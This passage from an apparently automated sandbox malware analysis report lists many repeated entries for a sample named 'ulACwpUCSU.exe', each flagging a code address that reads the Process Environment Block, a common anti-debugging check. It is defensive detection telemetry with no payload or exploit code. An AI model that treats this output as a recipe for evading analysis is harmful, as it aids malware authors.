        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37786400 mov eax, dword ptr fs:[00000030h]3_2_37786400
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37786400 mov eax, dword ptr fs:[00000030h]3_2_37786400
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A4F0 mov eax, dword ptr fs:[00000030h]3_2_3772A4F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A4F0 mov eax, dword ptr fs:[00000030h]3_2_3772A4F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF4FD mov eax, dword ptr fs:[00000030h]3_2_377AF4FD
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377194FA mov eax, dword ptr fs:[00000030h]3_2_377194FA
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377254E0 mov eax, dword ptr fs:[00000030h]3_2_377254E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4EF mov eax, dword ptr fs:[00000030h]3_2_3772E4EF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4EF mov eax, dword ptr fs:[00000030h]3_2_3772E4EF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F64F0 mov eax, dword ptr fs:[00000030h]3_2_376F64F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377144D1 mov eax, dword ptr fs:[00000030h]3_2_377144D1
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377144D1 mov eax, dword ptr fs:[00000030h]3_2_377144D1
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377884BB mov eax, dword ptr fs:[00000030h]3_2_377884BB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F24A2 mov eax, dword ptr fs:[00000030h]3_2_376F24A2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F24A2 mov ecx, dword ptr fs:[00000030h]3_2_376F24A2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4BC mov eax, dword ptr fs:[00000030h]3_2_3772E4BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov eax, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov eax, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377244A8 mov eax, dword ptr fs:[00000030h]3_2_377244A8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772B490 mov eax, dword ptr fs:[00000030h]3_2_3772B490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772B490 mov eax, dword ptr fs:[00000030h]3_2_3772B490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C490 mov eax, dword ptr fs:[00000030h]3_2_3777C490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F0485 mov ecx, dword ptr fs:[00000030h]3_2_376F0485
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770371 mov eax, dword ptr fs:[00000030h]3_2_37770371
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770371 mov eax, dword ptr fs:[00000030h]3_2_37770371
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771237A mov eax, dword ptr fs:[00000030h]3_2_3771237A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A350 mov eax, dword ptr fs:[00000030h]3_2_3772A350
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3336 mov eax, dword ptr fs:[00000030h]3_2_377C3336
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771332D mov eax, dword ptr fs:[00000030h]3_2_3771332D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E9303 mov eax, dword ptr fs:[00000030h]3_2_376E9303
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E9303 mov eax, dword ptr fs:[00000030h]3_2_376E9303
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772631F mov eax, dword ptr fs:[00000030h]3_2_3772631F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF30A mov eax, dword ptr fs:[00000030h]3_2_377AF30A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377233D0 mov eax, dword ptr fs:[00000030h]3_2_377233D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377743D5 mov eax, dword ptr fs:[00000030h]3_2_377743D5
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377243D0 mov ecx, dword ptr fs:[00000030h]3_2_377243D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F63CB mov eax, dword ptr fs:[00000030h]3_2_376F63CB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EC3C7 mov eax, dword ptr fs:[00000030h]3_2_376EC3C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776C3B0 mov eax, dword ptr fs:[00000030h]3_2_3776C3B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F93A6 mov eax, dword ptr fs:[00000030h]3_2_376F93A6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F93A6 mov eax, dword ptr fs:[00000030h]3_2_376F93A6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AD270 mov eax, dword ptr fs:[00000030h]3_2_377AD270
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D250 mov eax, dword ptr fs:[00000030h]3_2_3776D250
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D250 mov ecx, dword ptr fs:[00000030h]3_2_3776D250
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F24A mov eax, dword ptr fs:[00000030h]3_2_3771F24A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF247 mov eax, dword ptr fs:[00000030h]3_2_377AF247
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37710230 mov ecx, dword ptr fs:[00000030h]3_2_37710230
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777B214 mov eax, dword ptr fs:[00000030h]3_2_3777B214
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777B214 mov eax, dword ptr fs:[00000030h]3_2_3777B214
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA200 mov eax, dword ptr fs:[00000030h]3_2_376EA200
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E821B mov eax, dword ptr fs:[00000030h]3_2_376E821B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED2EC mov eax, dword ptr fs:[00000030h]3_2_376ED2EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED2EC mov eax, dword ptr fs:[00000030h]3_2_376ED2EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E72E0 mov eax, dword ptr fs:[00000030h]3_2_376E72E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377132C5 mov eax, dword ptr fs:[00000030h]3_2_377132C5
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E92AF mov eax, dword ptr fs:[00000030h]3_2_376E92AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B92AB mov eax, dword ptr fs:[00000030h]3_2_377B92AB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF2AE mov eax, dword ptr fs:[00000030h]3_2_377AF2AE
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377142AF mov eax, dword ptr fs:[00000030h]3_2_377142AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377142AF mov eax, dword ptr fs:[00000030h]3_2_377142AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EC2B0 mov ecx, dword ptr fs:[00000030h]3_2_376EC2B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E289 mov eax, dword ptr fs:[00000030h]3_2_3776E289
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3774717A mov eax, dword ptr fs:[00000030h]3_2_3774717A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3774717A mov eax, dword ptr fs:[00000030h]3_2_3774717A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F6179 mov eax, dword ptr fs:[00000030h]3_2_376F6179
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772716D mov eax, dword ptr fs:[00000030h]3_2_3772716D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772415F mov eax, dword ptr fs:[00000030h]3_2_3772415F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C5149 mov eax, dword ptr fs:[00000030h]3_2_377C5149
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF13E mov eax, dword ptr fs:[00000030h]3_2_377AF13E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777A130 mov eax, dword ptr fs:[00000030h]3_2_3777A130
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727128 mov eax, dword ptr fs:[00000030h]3_2_37727128
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727128 mov eax, dword ptr fs:[00000030h]3_2_37727128
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F510D mov eax, dword ptr fs:[00000030h]3_2_376F510D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37720118 mov eax, dword ptr fs:[00000030h]3_2_37720118
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
